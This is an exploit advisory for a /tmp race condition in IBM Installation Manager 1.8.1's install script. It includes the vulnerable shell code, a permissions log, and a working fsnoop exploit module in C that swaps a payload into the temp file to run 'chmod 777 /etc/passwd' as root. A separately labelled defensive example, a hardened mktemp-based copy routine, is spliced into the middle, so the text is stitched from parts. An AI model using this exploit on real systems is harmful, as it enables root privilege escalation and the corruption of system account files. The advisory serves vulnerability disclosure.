IBM Installation Manager 1.8.1 Race Condition

Posted Nov 12, 2015
Authored by Larry W. Cashdollar

The install script for IBM Installation Manager version 1.8.1 suffers from a /tmp race condition.

tags | exploit
SHA-256 | 61ddc1ecef489ff69c00edb7ed3182af444a773253d7beed708c57be0d98de12

Title: /tmp race condition in IBM Installation Manager V1.8.1 install script
Author: Larry W. Cashdollar, @_larry0
Date: 2015-10-29
Download Site: http://www-03.ibm.com/software/products/en/appserv-wasfordev
Vendor: IBM
Vendor Notified: 0000-00-00
Vendor Contact:
Description: IBM Installation Manager is a command line utility to install
various software packages developed by IBM.

=====> IBM Installation Manager> Password required

Credentials are required to connect to the IBM download site. Enter IBM ID
and password.

Select:
P. Provide credentials and connect
C. Cancel

Select 'P' to enter credentials and connect, or 'C' to cancel.

Forgot your IBM ID?
https://www.ibm.com/account/profile?page=forgotuid
Forgot your password?
https://www.ibm.com/account/profile?page=forgot
IBM ID help and FAQ
https://www.ibm.com/account/profile/us/en?page=regfaqhelp
-----> C
Vulnerability:
I noticed a /tmp race condition in IBM's Installation Manager software
install script.
The code in consoleinst.sh is:


46 TEMP=/tmp
47 tempScript=$TEMP/consoleinst-$$.sh
48 scriptLoc=`dirname "$0"`
49 slash=`expr "$scriptLoc" : "\(/\)"`
50 if [ "X$slash" != "X/" ]; then
51 scriptLoc=`pwd`/$scriptLoc
52 fi
53
54 if [ "$0" != "$tempScript" ]; then
55 cp "$0" "$tempScript"
56 cd "$TEMP"
57 origScriptLoc=$scriptLoc
58 export origScriptLoc
59 exec "$tempScript" $@
60 # should not return from above exec
61 exit 1
62 fi


If you guess the PID and create the file before the installer script does,
you can inject code to be executed at line 59.

This is a log of me controlling permissions of the file during installation
of the product:

[M] -rwxrwxrwx 1 larry larry 34 Thu Oct 29 21:46:10 2015
/tmp/consoleinst-9999.sh
[U] -rwxrwxrwx 1 larry larry 0 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh
[U] -rwxrwxrwx 1 larry larry 2225 Thu Oct 29 21:46:34 2015
/tmp/consoleinst-10382.sh

If I'm able to write to that file directly after it's modified (inotify() for
the win), I could inject commands into that installation script.
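The root cause is the predictable name /tmp/consoleinst-$$.sh written into a world-writable directory. The following is an added example (not IBM's code and not part of the advisory) of how the self-copy step at lines 46-59 can be done safely: the copy goes into a fresh mode-0700 directory created atomically by mktemp -d, so no other user can pre-create a file or FIFO at the destination or guess its name. The function name make_private_copy is made up for this example.

```shell
#!/bin/sh
# Added example, not the vendor's script: a hardened replacement for the
# "cp $0 /tmp/consoleinst-$$.sh" step in consoleinst.sh.
#
# Prints the path of a private copy of the script given as $1, or returns
# non-zero (after cleaning up) if anything looks wrong.
make_private_copy() {
    src=$1

    # mktemp -d creates the directory atomically with mode 0700 and an
    # unpredictable suffix, and fails instead of reusing an existing path.
    dir=$(mktemp -d "${TMPDIR:-/tmp}/consoleinst.XXXXXX") || return 1
    dest=$dir/consoleinst.sh

    # Nothing else can have created this path inside our private directory,
    # but refusing to overwrite is cheap insurance.
    if [ -e "$dest" ]; then
        rm -rf "$dir"
        return 1
    fi

    # Copy with a restrictive umask (subshell so the caller's umask is kept).
    if ! (umask 077 && cp "$src" "$dest"); then
        rm -rf "$dir"
        return 1
    fi

    # The destination must be a regular file, not a symlink or a FIFO,
    # before anyone exec()s it.
    if [ -L "$dest" ] || [ ! -f "$dest" ]; then
        rm -rf "$dir"
        return 1
    fi

    printf '%s\n' "$dest"
}
```

The caller would then exec the returned path instead of a name derived from $$, and remove the directory when the installer finishes.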
CVEID:
OSVDB:
Exploit Code:
/*
fsnoop v3.3 module for exploitation of:
http://www.vapidlabs.com/advisory.php?v=156
special thanks to v14dz for getting this working, and Mudge @dotmudge for
pointing me
at his /tmp race condition tool l0pht-watch.

@v14dz
http://vladz.devzero.fr/

$ make ibm-console.so

/tmp/x is :

#!/bin/sh
chmod 777 /etc/passwd

$ ./fsnoop -p ibm-consoleinst.so
[+] ./ibm-consoleinst.so: ** IBM Console Install Exploit **
[+] ./ibm-consoleinst.so: payload=[0xb77775fb]
file=[/tmp/consoleinst-HEREPID.sh]
[+] ./ibm-consoleinst.so: waiting for command: "/bin/sh ./consoleinst.sh"
[+] ./ibm-consoleinst.so: Exploitation done.
[+] ./ibm-consoleinst.so: Unloading module.

ls -l /etc/passwd
-rwxrwxrwx 1 root root 1901 Nov 22 2014 /etc/passwd

*/



#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>   /* rename() */

char title[] = "** IBM Console Install Exploit **";

/* filters */
char proc_name[] = "/bin/sh ./consoleinst.sh";
char file[] = "/tmp/consoleinst-HEREPID.sh";

/* Evil routines */
void payload() {
int fd;
/*from v14dz: I use a fifo here, to unlock the paymod execution right after
the cp command*/
mkfifo(file, 0666);
/* open() on a FIFO blocks until the installer's cp opens it for writing */
fd = open(file, O_RDONLY);
(void)fd;
rename(file, "/tmp/a");
rename("/tmp/x", file);
}
Screen Shots:
Advisory: http://www.vapidlabs.com/advisory.php?v=156

